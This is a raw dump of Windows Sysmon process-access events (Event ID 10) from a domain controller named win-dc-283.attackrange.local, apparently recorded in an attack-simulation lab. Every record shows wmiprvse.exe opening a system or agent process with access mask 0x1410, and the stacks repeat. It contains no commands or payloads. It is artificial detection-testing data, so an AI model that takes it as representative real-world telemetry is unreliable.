15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022967Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022966Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022965Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022964Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022963Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022962Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022961Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022960Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022959Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022958Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022957Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022956Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022955Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022954Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022953Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022952Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022951Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022950Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022949Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022948Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 